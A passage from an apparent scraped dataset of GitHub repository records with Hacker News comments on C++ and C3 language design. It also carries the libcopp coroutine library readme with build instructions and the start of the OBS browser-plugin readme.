nullptr values, but that's a good first step towards the type annotations I _do_ want)I think this is an interesting idea but I also think it will never gain adoption.Move constructors/Move assignment should be noexcept by default. It's not entirely clear to me what a program ought to do if a move constructor/assignment operator throws an exception. In a general sense you cannot 'trust' the old object to not have been modified.\"All basic types (excluding pointers and references) are const by default\" -- why the exception?The rule of zero should be acceptable in addition to the rule of 6. Also, the rule of 5 is acceptable in many circumstances; lots of classes should not have default constructors. I agree that having 1,2,3, or 4 are bad, but 0,5,6 are acceptable.Couldn't most of these be covered by a linter? I'm not sure you really need a new language for this. Even right now in Visual Studio resharper is constantly telling me about things that can be constexpr or const and a lot of the other things you mention here.IMO it would help adoption if you supply a clang-powered rewriter into and out of your language variant. It allays the fear of losing your codebase if the compiler project dies.Reverse the default for typename. Currently some_class::thing is assumed to be an expression where 'thing' is a variable, when we don't know which template pattern to use because there may be an explicit specialization on the T that the user chooses. Hence, we have to say \"typename std::vector::iterator it;\" instead of just saying \"std::vector::iterator it;\". Instead, reverse that and assume it's a type by default unless shown that it's an expression. You'll need a new keyword for that, replacing \"typename\".Remove the promotion-to-int rules. Currently in C (and in C++) unsigned short test(unsigned short a, unsigned short b, unsigned short c) {\n unsigned short x = a * b * c;\n return x;\n }\n\ncan have UB as signed integer overflow because any math done on an object smaller than int gets promoted to int. (No, you can't fix this with \"(((unsigned short)x) * ((unsigned short)y))\" the promotion happens on 's LHS and RHS, if those have types smaller than int.) Beyond this, people seem to expect that the type of the variable declaration will appertains to the calculation on the right, but it doesn't. For instance people seem to think \"float f = a + b;\" can't overflow where 'a' and 'b' are ints, because the assignment is going into a float.I haven't thought this idea through completely yet. Extend pointer types to include a static allocation identity as part of the type. Address-of local variable or global variable should produce one of these pointers. A \"static allocation identity\" is a special-typed zero-size variable, so you can stick it in code or as a class member. You could have pointers that were guaranteed to be allocated by THIS allocation point, instead of pointing to every possible T in the program. I'll fake up a syntax, \"tree_node ^ tree::node_alloc \". It's known not to alias any other TreeNode the program might have, it has to be attached to the allocation point owned by that specific \"node_alloc\" in that object. (Let me phrase it differently. A tree in C or C++ has pointers which can point anywhere as long as it's another tree node type. That could be pointing to a different tree, it could be a self-pointer, it could be pointing up the tree, and so on. If your tree_node class has an allocation root, you can say that the pointers are things allocated through this allocation root. They can not outlive the allocation root. They are distinct from the things allocated by other allocation roots, which are the same tree_node types, but different tree_node objects. The node's list of children is std::vector> so it clearly only holds pointers it allocated itself.)There's another problem with pointer related to the above. Some code I saw used a \"T &get_or_default(Container &c, K key, V &default);\" and the problem was that people would call it with a temporary for the default, like \"Value &x = get_or_default(mymap, key, Value());\" and they'd be holding a dangling reference. If you could make that an error, that'd be great. Maybe we use a trick like the \"allocation root\" above and treat pointers or references to temporaries have different type from the local variable. Then get_or_default takes and returns a reference-to-temporary and attempting to assign that to a reference in a variable declaration fails. Unlike the previous \"allocation root\" idea where you indicate the only thing you accept, this would be a case where you accept all allocation roots except one, the \"temporaries\" allocation root.As far as I know, no compiler takes advantage of the freedom of the order of operations except in the most trivial ways. Everyone knows that in \"f() g() + h()\" that * must happen before +, but people think this means that f() and g() must happen before h(). No, they may happen in any order at all. I had to fix a lot of code that did \"Print(stream.read(), stream.size())\" where \"read\" updates the pointer and leaves size == 0: gcc ran stream.size() first and clang ran stream.read() first, setting the subsequent size to zero. Similar issue with \"expr1() = expr2();\" expressions.Extend switch() and case to work on objects with any operator== defined. Add a statement for fallthrough and default to 'break;' before the start of the next case-label. Give each case label its own scope so I can declare variables in there without adding my own curly-braces. (Bonus 1 can you design a way to ensure that case labels are not overlapping? May require something other than operator==. Bonus 2 can you allow cases to be structured binding matches, similar to Rust?)Speaking of structured binding, it's great but doesn't allow nesting. This std::vector>> v;\n for (auto [name, [lhsid, rhsid]] : v) {\n\nis code I actually wanted to write in the past week yet that's a syntax error.Add the ability to declare object inheritance (\"class Derived : Base;\") so that I can cast between them before writing out the body of the derived class. Also allow me to write out the entire class tree with no possibility for extension in another translation unit. The \"final\" keyword states that a class may not be derived from, but I usually have a Base class which does have subclasses, but a known list of subclasses that will never grow without recompiling the whole project. Currently the compiler has to assume I could write a new subclass and compile it into a shared object that the existing program dlopen's and the existing program will work. It's crazy. No, I have the final tree not just some leaf classes, please devirtualize the whole thing for me.Are ABI changes on the table? Explicit template instantiations and explicit specializations should mangle differently. See my comment elsewhere: https://github.com/dealii/dealii/issues/3705#issuecomment-11...If I think of some more, I'll reply to myself.- define the evaluation order for function parameters, e.g. f(a(), b()) [or is that well defined in modern C++?]- allow for named arguments. E.g. let's say for the definition f(int a = 12, int b = 42), one might call f(b: 1337) or f(12, 1337). Not allowing mixing of named & positional is probably a good idea.- take a look at static verification and remove language features that make static verification more difficult and think about how you could replace them (or remove; but e.g. function pointers & similar stuff fall in that category and are probably to powerful to be sacrificed this way)//Edit: as others have said, try to whack as much undefined behaviour as possible (and in case you can't, don't accept the input program).Rather than build a new compiler, I wonder if this might be easier to integrate as a static checker. IMO clang static checks are not that difficult to write. The hardest thing can be the query to find the interesting elements. But you're banning/requiring fairly high-level language elements so they should be pretty easy queries to write.I think it's a great experiment, keep doing what you're doing. Removing the footguns from C++ without wildly changing the syntax up is a solid idea.How hard would it be to automatically convert some existing C++ into the new language? It seems like your compiler can diagnose the errors, so inserting `mutable` and `bool(...)` should be possible.It might be interesting to do this on an existing codebase just to see where mutable is needed.Aside - Documentation says:> It is possible to cast the variant type to any pointer type, which will return null if the types match, or the pointer value otherwise.That seems backwards to me. Maybe it's just me? Surely if the types match that's when we get the pointer value ?My main point - StringsI think at this point good strings are table stakes. If you're a general purpose language, people are going to use strings. Are they going to make a hash table of 3D vectors? Maybe. Are they going to do finite field arithmetic? Maybe. Are they going to need networking? Maybe. But they are going to use strings. C's strings are reprehensibly awful. C++ strings are, astoundingly, both much more complicated and worse in many ways, like there was a competition. You need to be doing a lot better than that IMHO.I happen to really like Rust's str but I'm not expecting to see something so feature rich in a language like C3. I am expecting a lot more than from a fifty year old programming language though.Looks interesting, thanks! Just curious, any plans for supporting SIMD, similar\nto gcc's vector extensions ?This looks awesome! The main thing holding me back from switching from C++ to C is the lack of type safe generic programming. This language looks like it not only solves that, but adds some other interesting features like defer that I've been wanting to try out :D. It looks like there are some examples of large projects getting successfully compiled by C3 (the vkDoom).Since this is still only alpha 0.2, I'm curious how stable the compiler is and whether the core language features are subject to change? I'd love to start using this on some projects, but I'm always afraid to adopt a language in its early stages.Looking at the primer... // C\n typedef struct\n {\n int a;\n struct \n {\n double x;\n } bar;\n } Foo;\n\n // C3\n struct Foo\n {\n int a;\n struct bar \n {\n double x;\n }\n }\n\nVery confused by this. The C code declares an anonymous struct type, then aliases the typename \"Foo\" to that anonymous struct type. The C3 code seems to declares a named struct type \"Foo\" -- why isn't the C equivalent here just \"struct Foo\"?But then within the struct it gets weirder... the C code declares a second anonymous struct, and then declares a member variable of that type. The C3 code... declares a struct named \"bar\" and also a member variable with name matching the type? Except the primer says that these are equivalent, so the C3 code is declaring an anonymous struct and a member of that type? Using the same syntax as the outer declaration did to declare a named type but no (global) variable?? Is this case sensitive?I don't think I can get further into the primer than this... even taking the author at their word that the two snippets are equivalent, I don't understand what's in play (case sensitivity? declarations where variable name must match type name?) to make this sane, and there's zero rationale given for these decisions.what is it with fn()? If we are so much into being terse then int abc() should be just fine. If we need readability than function() instead of fn() would do better.In my experience of using D at work alongside people who barely know how to program (i.e. smart but not culturally a Dev), and people who just didn't know D: if you have smart devs simplicity doesn't matter very much.If anything it's easier to teach a concept than wait for a programmer to be able to see through a wall of messy simplicity.A big win C3 explicitly opts out of are integer types named by their size such as u8/u16/u32/.., yet explicitly sizes the types it does have. Another sore point in C: how do expressions involving different integer types work?Just take C, remove the integer promotion and implicit casts (it means casting constant literals, yes), except for void* ofc. Remove those horrible __thread, generic, typedef (use the preprocessor for function types?), restrict, all optimization \"hints\", etc keywords. Finally standardize properly the preprocessor macro with a variadic number of arguments... Split completely the syntax definition from the the runtime lib (the main() function, etc).It seems there is more to remove from C than to add.Holy crap I\u2019ve been wanting to make basically this exact language for a while now: C with modules and defer!I am wondering how strings are represented (I dislike the sentinel value scheme we have now), and what the library/locale situation is like (hoping it just says everything is UTF8).Awesome that someone went and did it for me! The one thing I don\u2019t like is the fn declaration, but reading other comments it makes sense why it\u2019s there and I\u2019m sure I\u2019ll get used to it.Should compare with DasBetterC too!https://dlang.org/spec/betterc.htmlAwesome stuff. It seems like a C+ instead of C++ to me.I wish it has class/object/ctor/dtor/RAII though, no need for exception. OOD in C using struct and function pointers are doable but is a bit cumbersome. I don't even need runtime overloading or virtual inheritance or any fancy/advanced features of c++, just a better way to organize code in an OOD style is enough, something like Javascript's class sugar syntax to its prototype object syntax(here will be c++ style to struct+function-pointer-style).I think we do need a language like this, and that Zig/Odin/Myrddin/etc have the issue of having a syntax too different from C (Zig being the least offending; Hare is okay but perhaps a bit too minimal). This is great. Are there plans for a package manager? What's the target stdlib size?That said, I'm not a big fan of the naming. It irrationally feels kinda hard to justify using a language called \"C3\" (and I also irrationally like cute names and mascots like Hare has).> requiring `fn` in front of the functions. This is to simplify searching for definitions in editors.You don't have to do that even in C, you can use this style for function defs static int\n myfunc(...)\n {\n ...\n }\n\nand search or grep for ^myfunc\\(\n\nto isolate the definition as opposed to the use.Hey, I like any language with this kind of goto:http://www.c3-lang.org/statements/#nextcase-and-labelled-nex...> It's also possible to use nextcase with an expression, to jump to an arbitrary case: switch (i)\n {\n case 1:\n doSomething();\n nextcase 3; // Jump to case 3\n case 2:\n doSomethingElse();\n case 3:\n nextcase rand(); // Jump to random case\n default:\n libc::printf(\"Ended\\n\");\n }\n\n> Which can be used as structured goto when creating state machines.Glanced. 17 or 18 years ago I implemented my own programming language too so I can only say: keep on. Just a quick note in terms of Art and Beauty: what I expect from a new language is expressiveness, and encouragement of good programming techniques, so that a code written by an average programmer in the worst mood would not look as a total mess.I'm puzzled with what the market for these kinds of languages are.C is sort of a dead end. There is very little innovation there. And that's fine; the users of the language seem to want it that way. They just want to write software the same way they've been doing for the last 20 years. Why would such a conservative user base want to switch to a different language like C3?Linus once said this about Subversion: \"Subversion has been the most pointless project ever started... Subversion used to say, 'CVS done right.' With that slogan there is nowhere you can go. There is no way to do CVS right.\" Could C3 be the Subversion of programming languages?You'll probably get varying answers to your question based on who you ask, but I would recommend developing an expertise in one particular area -- perhaps in one individual project, or even a subcomponent of a project -- that you care about and will naturally develop an encyclopediac knowledge of simply because you find it fascinating enough to want to read everything about it (historic and ongoing).So now you're an expert in that field - and it doesn't feel like work, because it's what you enjoy and want to see advance technologically. Now what you do is look around to see who benefits from experience in that area. If you're lucky, they've reached out to you already.Worst case, you've learned about and perhaps developed and furthered a technology cause that you care about. Best case, you've found an employer (and team) who want to do the same.What's your favourite example of a static analysis success story?> Some recent examples of such low-level work I can think of, are: Linux kernel development, sanitizers and static analysis in GCC and Clang, new languages and their compilers and tools (Rust, Go, WebAssembly, etc), regular improvements in web browser engines, databases features.All that you have listed are available for contributions from beginners. Choose the field you like and start lurking on their mailing lists; download the source code, try to understand it and ask questions (let developers on the mailing list know that you are a beginner and want to contribute, and ask what is the best approach to get to speed with the codebase)If I wanted to do Linux Kernel development, I'd apply at Red Hat. I've got a buddy who interviews newish kernel developers out of school for them - it doesn't sound like he's looking for anything super specific either - he's often dismayed at how new graduates he talks to aren't even up on source control or other things he considers fundamental. He's US based but the teams are international (though I don't know if they'd hire from any country; maybe just specific ones).Anyway, that's where I'd apply.M1 uses the ARM64[1] instruction set and a lot of compilers started working on ARM64 years ago so in many cases compilers were already ready before M1 was announced. Creating a macOS/ARM64 toolchain is mostly a combination of existing features from Linux/ARM64 and macOS/x86-64. For example, Linux uses ELF but macOS needs a Mach-O linker but most languages already had Mach-O support anyway. Once you have the toolchain it's a matter of recompiling and fixing any non-portable assumptions in the code. Fortunately x86-64 and ARM64 are both 64-bit little-endian so porting is fairly easy but the memory consistency models are different which can expose bugs in poorly-written code.[1] The official name is something else but it's dumb", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "owent/libcopp", "link": "https://github.com/owent/libcopp", "tags": ["boost", "coroutine", "cpp", "cross-platform", "performance", "c-plus-plus", "assembly", "await", "then", "timer", "stack", "pool", "thread-safety", "lock-free", "ha", "high-performance", "window", "linux", "macos"], "stars": 641, "description": "cross-platform coroutine library in c++", "lang": "C++", "repo_lang": "", "readme": "libcopp\n============\n\n.. _MIT LICENSE: https://github.com/owent/libcopp/blob/v2/LICENSE\n.. _`docs/libcopp.doxyfile.in`: https://github.com/owent/libcopp/blob/v2/docs/libcopp.doxyfile.in\n.. _`docs/sphinx`: https://github.com/owent/libcopp/blob/v2/docs/sphinx\n.. _cmake: https://cmake.org/\n.. _binutils: http://www.gnu.org/software/binutils/\n.. _llvm: http://llvm.org/\n.. _gtest: https://github.com/google/googletest\n.. _Boost.Test: (http://www.boost.org/doc/libs/release/libs/test\n.. _vcpkg: https://github.com/Microsoft/vcpkg\n\nCross-platform coroutine library in C++ .\n\n.. image:: https://img.shields.io/github/forks/owent/libcopp?style=social\n.. image:: https://img.shields.io/github/stars/owent/libcopp?style=social\n\n.. |release-badge| image:: https://img.shields.io/github/v/release/owent/libcopp\n :alt: Release\n :target: https://github.com/owent/libcopp/releases\n\n.. |code-size-badge| image:: https://img.shields.io/github/languages/code-size/owent/libcopp\n :alt: Code size\n :target: https://github.com/owent/libcopp\n\n.. |repo-size-badge| image:: https://img.shields.io/github/repo-size/owent/libcopp\n :alt: Repo size\n :target: https://github.com/owent/libcopp\n\n.. |forks-badge| image:: https://img.shields.io/github/forks/owent/libcopp?style=social\n :alt: Forks\n :target: https://github.com/owent/libcopp\n\n.. |stars-badge| image:: https://img.shields.io/github/stars/owent/libcopp?style=social\n :alt: Stars\n :target: https://github.com/owent/libcopp\n\n.. |ci-badge| image:: https://github.com/owent/libcopp/actions/workflows/main.yml/badge.svg\n :alt: CI build status\n :target: https://github.com/owent/libcopp/actions/workflows/main.yml\n\n.. |codecov-badge| image:: https://codecov.io/gh/owent/libcopp/branch/v2/graph/badge.svg\n :alt: Coveralls coverage\n :target: https://codecov.io/gh/owent/libcopp\n\n.. |lgtm-badge| image:: https://img.shields.io/lgtm/grade/cpp/g/owent/libcopp.svg?logo=lgtm&logoWidth=18\n :alt: Language grade: C/C++\n :target: https://lgtm.com/projects/g/owent/libcopp/context:cpp\n\n|release-badge| |code-size-badge| |repo-size-badge| |ci-badge| |codecov-badge| |lgtm-badge| |forks-badge| |stars-badge|\n\nCI Job Matrix\n----------------\n\n+---------------+--------------------+-----------------------+\n| Target System | Toolchain | Note |\n+===============+====================+=======================+\n| Linux | GCC | Static linking |\n+---------------+--------------------+-----------------------+\n| Linux | GCC | Dynamic linking |\n+---------------+--------------------+-----------------------+\n| Linux | GCC-latest | |\n+---------------+--------------------+-----------------------+\n| Linux | GCC-latest | No Exception |\n+---------------+--------------------+-----------------------+\n| Linux | GCC-latest | Thread Unsafe |\n+---------------+--------------------+-----------------------+\n| Linux | GCC 4.8 | Legacy |\n+---------------+--------------------+-----------------------+\n| Linux | Clang-latest | With libc++ |\n+---------------+--------------------+-----------------------+\n| MinGW64 | GCC | Dynamic linking |\n+---------------+--------------------+-----------------------+\n| Windows | Visual Studio 2019 | Static linking |\n+---------------+--------------------+-----------------------+\n| Windows | Visual Studio 2019 | Dynamic linking |\n+---------------+--------------------+-----------------------+\n| Windows | Visual Studio 2017 | Legacy,Static linking |\n+---------------+--------------------+-----------------------+\n| macOS | AppleClang | With libc++ |\n+---------------+--------------------+-----------------------+\n\nLICENSE\n------------\n\nLicense under the `MIT LICENSE`_\n\nDocument\n------------\n\nDocuments can be found at https://libcopp.atframe.work , API references canbe found at https://libcopp.atframe.work/doxygen/html/ .(Generated by sphinx and doxygen with `docs/sphinx`_ and `docs/libcopp.doxyfile.in`_).\n\n\nUPGRADE FROM 1.3.X-1.4.X to 2.X\n------------------------------------\n\n+ Add ``using value_type = int;`` into ``T`` when using ``cotask::task``.\n+ Rename ``stack_allocator_t`` to ``stack_allocator_type`` in ``T`` when using ``cotask::task``.\n+ Rename ``coroutine_t`` to ``coroutine_type`` in ``T`` when using ``cotask::task``.\n+ Rename ``libcopp::util::*`` to ``copp::util::``.\n+ We are not allowed to use ``libcopp::util::intrusive_ptr`` now, please use ``cotask::task::ptr_type`` instead.\n\nUPGRADE FROM 1.2.X to 1.3.X-1.4.X\n------------------------------------\n\n+ Rename ``cotask::task::await`` into ``cotask::task::await_task``\n+ Replace ``cotask::task`` with ``cotask::task`` , we don't allow to custom id allocator now.\n+ Replace ``cotask::core::standard_int_id_allocator`` with ``copp::util::uint64_id_allocator`` , we don't allow to custom id allocator now.\n+ Require gcc 4.8+, MSVC 15+(Visual Studio 2017)>)\n+ Require `cmake`_ 3.12.0 or upper\n\nINSTALL\n------------\n\n| libcopp use `cmake`_ to generate makefile and switch build tools.\n\nPrerequisites\n^^^^^^^^^^^^^^^^\n\n* **[required]** GCC or Clang or MSVC or clang-cl support ISO C++ 11 and upper\n* **[required]** `cmake`_ 3.16.0 and upper\n* **[optional]** `gtest`_ 1.6.0 and upper (Better unit test supported)\n* **[optional]** `Boost.Test`_ (Boost.Test supported)\n\nUnix\n^^^^^^^^^^^^^^^^\n\n* **[required]** ``ar, as, ld`` (`binutils`_) or `llvm`_\n* **[optional]** if using `gtest`_ , pthread is required.\n\nWindows\n^^^^^^^^^^^^^^^^\n\n* **[required]** masm (in MSVC)\n* **[optional]** if using `gtest`_, pthread is required.\n\nInstall with vcpkg\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n1. Clone and setup `vcpkg`_ (See more detail on https://github.com/Microsoft/vcpkg)\n .. code-block:: shell\n\n git clone https://github.com/Microsoft/vcpkg.git\n cd vcpkg\n PS> bootstrap-vcpkg.bootstrap\n Linux:~/$ ./bootstrap-vcpkg.sh\n\n2. Install libcopp\n .. code-block:: shell\n\n PS> .\\vcpkg install libcopp [--triplet x64-windows-static/x64-windows/x64-windows-static-md and etc...]\n Linux:~/$ ./vcpkg install libcopp\n\n3. See :ref:`using with cmake ` for cmake below.\n\nCustom Build\n^^^^^^^^^^^^^^^^\n\n1. Clone and make a build directory\n .. code-block:: shell\n\n git clone --single-branch --depth=1 -b master https://github.com/owent/libcopp.git \n mkdir libcopp/build && cd libcopp/build\n\n2. Run cmake command\n .. code-block:: shell\n\n # cmake [options...]\n cmake .. -DPROJECT_ENABLE_UNITTEST=YES -DPROJECT_ENABLE_SAMPLE=YES\n\n3. Make libcopp\n .. code-block:: shell\n\n cmake --build . --config RelWithDebInfo # or make [options] when using Makefile\n\n4. Run ``test/sample/benchmark`` *[optional]*\n .. code-block:: shell\n\n # Run test => Required: PROJECT_ENABLE_UNITTEST=YES\n ctest -VV . -C RelWithDebInfo -L libcopp.unit_test\n # Run sample => Required: PROJECT_ENABLE_SAMPLE=YES\n ctest -VV . -C RelWithDebInfo -L libcopp.sample\n # Run benchmark => Required: PROJECT_ENABLE_SAMPLE=YES\n ctest -VV . -C RelWithDebInfo -L libcopp.benchmark\n\n5. Install *[optional]*\n .. code-block:: shell\n\n cmake --build . --config RelWithDebInfo --target install # or make install when using Makefile\n\n6. Then just include and link ``libcopp.*/libcotask.*``, or see :ref:`using with cmake ` for cmake below.\n\nCMake Options\n----------------\n\nOptions can be cmake options. such as set compile toolchains, source directory or options of libcopp that control build actions. libcopp options are listed below:\n\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| Option | Description |\n+==========================================+==============================================================================================================================+\n| BUILD_SHARED_LIBS=YES|NO | [default=NO] Build dynamic library. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_ENABLE_SEGMENTED_STACKS=YES|NO | [default=NO] Enable split stack supported context.(it's only availabe in linux and gcc 4.7.0 or upper) |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_ENABLE_VALGRIND=YES|NO | [default=YES] Enable valgrind supported context. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| PROJECT_ENABLE_UNITTEST=YES|NO | [default=NO] Build unit test. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| PROJECT_ENABLE_SAMPLE=YES|NO | [default=NO] Build samples. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_LOCK_DISABLE_THIS_MT=YES|NO | [default=NO] Disable multi-thread support for ``copp::this_coroutine`` and ``cotask::this_task``. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_DISABLE_ATOMIC_LOCK=YES|NO | [default=NO] Disable multi-thread support. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOTASK_ENABLE=YES|NO | [default=YES] Enable build libcotask. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_FCONTEXT_USE_TSX=YES|NO | [default=YES] Enable `Intel Transactional Synchronisation Extensions (TSX) `_. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| GTEST_ROOT=[path] | set gtest library install prefix path |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| BOOST_ROOT=[path] | set Boost.Test library install prefix path |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n\nUSAGE\n------------\n\n.. _usage-using with-cmake:\n\nUsing with cmake\n^^^^^^^^^^^^^^^^\n\n1. Using ``set(Libcopp_ROOT )``\n2. Just using `find_package(Libcopp) `_ to use libcopp module.\n3. Example:(we assume the target name is stored in ``${CUSTOM_TARGET_NAME}``)\n\n.. code-block:: cmake\n\n find_package(Libcopp CONFIG REQUIRED)\n target_link_libraries(${CUSTOM_TARGET_NAME} libcopp::cotask)\n # Or just using copp by target_link_libraries(${CUSTOM_TARGET_NAME} libcopp::copp)\n\nIf using MSVC and vcpkg, CRT must match the triplet of vcpkg, these codes below may be helpful:\n\n.. code-block:: cmake\n\n if (MSVC AND VCPKG_TOOLCHAIN)\n if(DEFINED ENV{VCPKG_DEFAULT_TRIPLET} AND NOT DEFINED VCPKG_TARGET_TRIPLET)\n set(VCPKG_TARGET_TRIPLET \"$ENV{VCPKG_DEFAULT_TRIPLET}\" CACHE STRING \"\")\n endif()\n if (VCPKG_TARGET_TRIPLET MATCHES \"^.*windows-static$\")\n set(CMAKE_MSVC_RUNTIME_LIBRARY \"MultiThreaded$<$:Debug>\" CACHE STRING \"\")\n else ()\n set(CMAKE_MSVC_RUNTIME_LIBRARY \"MultiThreaded$<$:Debug>DLL\" CACHE STRING \"\")\n endif ()\n endif ()\n\nSee more detail on https://github.com/Microsoft/vcpkg/tree/master/ports/libcopp .\n\nDirectly use headers and libraries\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nJust include headers and linking library file of your platform to use libcopp.\n\n.. code-block:: shell\n\n LIBCOPP_PREFIX=\n\n # Example command for build sample with gcc 4.9 or upper on Linux\n for source in sample_readme_*.cpp; do\n g++ -std=c++14 -O2 -g -ggdb -Wall -Werror -fPIC -rdynamic -fdiagnostics-color=auto -Wno-unused-local-typedefs \\\n -I$LIBCOPP_PREFIX/include -L$LIBCOPP_PREFIX/lib64 -lcopp -lcotask $source -o $source.exe;\n done\n\n # Example command for build sample with clang 3.9 or upper and libc++ on Linux\n for source in sample_readme_*.cpp; do\n clang++ -std=c++17 -stdlib=libc++ -O2 -g -ggdb -Wall -Werror -fPIC -rdynamic \\\n -I$LIBCOPP_PREFIX/include -L$LIBCOPP_PREFIX/lib64 -lcopp -lcotask -lc++ -lc++abi \\\n $source -o $source.exe;\n done\n\n # AppleClang on macOS just like those scripts upper.\n # If you are using MinGW on Windows, it's better to add -static-libstdc++ -static-libgcc to \n # use static linking and other scripts are just like those on Linux.\n\n\n.. code-block:: shell\n\n # Example command for build sample with MSVC 1914 or upper on Windows & powershell(Debug Mode /MDd)\n foreach ($source in Get-ChildItem -File -Name .\\sample_readme_*.cpp) {\n cl /nologo /MP /W4 /wd\"4100\" /wd\"4125\" /EHsc /std:c++17 /Zc:__cplusplus /O2 /MDd /I$LIBCOPP_PREFIX/include $LIBCOPP_PREFIX/lib64/copp.lib $LIBCOPP_PREFIX/lib64/cotask.lib $source\n }\n\n\nGet Start & Example\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThere serveral samples to use ``copp::coroutine_context`` \u3001 ``copp::coroutine_context_fiber`` and ``cotask::task`` :\n\n1. Using coroutine context\n2. Using coroutine task\n3. Using coroutine task manager\n4. Using stack pool\n5. Using ``task::then`` or ``task::await_task``\n6. Using ``copp::callable_promise`` of c++20 coroutine\n7. Using ``copp::generator_future`` for c++20 coroutine\n8. Custom error (timeout for example) when using c++20 coroutine\n9. Let c++20 coroutine work with ``cotask::task``\n10. Using Windows fiber and ``SetUnhandledExceptionFilter`` on Windows with ``cotask::task``\n\nAll sample codes can be found on :ref:`EXAMPLES ` and `sample `_ .\n\nNOTICE\n------------\n\nSplit stack support: if in Linux and user gcc 4.7.0 or upper, add ``-DLIBCOPP_ENABLE_SEGMENTED_STACKS=YES`` to use split stack supported context.\n\nIt's recommanded to use stack pool instead of gcc splited stack.\n\nBENCHMARK\n------------\n\nPlease see CI output for latest benchmark report. Click to visit `Github Actions `_ .\n\nFAQ\n------------\n\nQ: How to enable c++20 coroutine\n\n| ANS: Add ``/std:c++latest /await`` for MSVC 1932 and below or ``-std=c++20 -fcoroutines-ts -stdlib=libc++`` for clang 13 and below or ``-std=c++20 -fcoroutines`` for gcc 10.\n\nIf you can just use ``-std=c++20 -stdlib=libc++`` clang 14 or above, ``-astd=c++20`` for gcc 11 or above, and ``/std:c++latest`` for MSVC 1932 or above.\n\nQ: Will libcopp handle exception?\n\n| ANS: When using c++11 or above, libcopp will catch all unhandled exception and rethrow it after coroutine resumed.\n\nQ: Why ``SetUnhandledExceptionFilter`` can not catch the unhandled exception in a coroutine?\n\n| ANS: ``SetUnhandledExceptionFilter`` only works with **Windows Fiber**, please see `sample/sample_readme_11.cpp `_ for details.\n\nFEEDBACK\n------------\n\nIf you has any question, please create a issue and provide the information of your environments. For example:\n\n+ **OS**: Windows 10 Pro 19041 *(This can be see after running ``msinfo32``)* / Manjaro(Arch) Linux Linux 5.4.39-1-MANJARO\n+ **Compiler**: Visual Studio 2019 C++ 16.5.5 with VS 2019 C++ v14.25 or MSVC 1925/ gcc 9.3.0\n+ **CMake Commands**: ``cmake .. -G \"Visual Studio 16 2019\" -A x64 -DLIBCOPP_FCONTEXT_USE_TSX=ON -DPROJECT_ENABLE_UNITTEST=ON -DPROJECT_ENABLE_SAMPLE=ON-DCMAKE_BUILD_TYPE=RelWithDebInfo -DCMAKE_INSTALL_PREFIX=%cd%/install-prefix`` / ``cmake .. -G Ninja -DLIBCOPP_FCONTEXT_USE_TSX=ON -DPROJECT_ENABLE_UNITTEST=ON -DPROJECT_ENABLE_SAMPLE=ON -DCMAKE_BUILD_TYPE=RelWithDebInfo -DCMAKE_INSTALL_PREFIX=/opt/libcopp``\n+ **Compile Commands**: ``cmake --build . -j``\n+ **Related Environment Variables**: Please provide all the environment variables which will change the cmake toolchain, ``CC`` \u3001 ``CXX`` \u3001 ``AR`` and etc.\n\nCONSTRIBUTORS\n------------------------\n\n+ `owent `_\n\nTHANKS TO\n------------\n\n+ `mutouyun `_\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "matzman666/OpenVR-InputEmulator", "link": "https://github.com/matzman666/OpenVR-InputEmulator", "tags": [], "stars": 641, "description": "An OpenVR driver that allows to create virtual controllers, emulate controller input, manipulate poses of existing controllers and remap buttons. A client-side library that communicates with the driver via shared-memory is also included.", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "obsproject/obs-browser", "link": "https://github.com/obsproject/obs-browser", "tags": ["obs-studio", "cef", "c-plus-plus", "c"], "stars": 641, "description": "CEF-based OBS Studio browser plugin", "lang": "C++", "repo_lang": "", "readme": "# obs-browser\n\nobs-browser introduces a cross-platform Browser Source, powered by CEF ([Chromium Embedded Framework](https://bitbucket.org/chromiumembedded/cef/src/master/README.md)), to OBS Studio. A Browser Source allows the user to integrate web-based overlays into their scenes, with complete access to modern web APIs.\n\nAdditionally, obs-browser enables Service Integration (linking third party services) and Browser Docks (webpages loaded into the interface itself) on all supported platforms, except for Wayland (Linux).\n\n**This plugin is included by default** on official packages on Windows, macOS, the Ubuntu PPA and the official [Flatpak](https://flathub.org/apps/details/com.obsproject.Studio) (most Linux distributions).\n\n## JS Bindings\n\nobs-browser provides a global object that allows access to some OBS-specific functionality from JavaScript. This can be used to create an overlay that adapts dynamically to changes in OBS.\n\n### TypeScript Type Definitions\n\nIf you're using TypeScript, type definitions for the obs-browser bindings are available through npm and yarn.\n\n```sh\n# npm\nnpm install --save-dev @types/obs-studio\n\n# yarn\nyarn add --dev @types/obs-studio\n```\n\n### Get Browser Plugin Version\n\n```js\n/**\n * @returns {string} OBS Browser plugin version\n */\nwindow.obsstudio.pluginVersion\n// => 2.17.0\n```\n\n### Register for event callbacks\n\n```js\n/**\n * @callback EventListener\n * @param {CustomEvent} event\n */\n\n/**\n * @param {string} type\n * @param {EventListener} listener\n */\nwindow.addEventListener('obsSceneChanged', function(event) {\n\tvar t = document.createTextNode(event.detail.name)\n\tdocument.body.appendChild(t)\n})\n```\n\n#### Available events\n\nDescriptions for these events can be [found here](https://obsproject.com/docs/reference-frontend-api.html?highlight=paused#c.obs_frontend_event).\n\n* 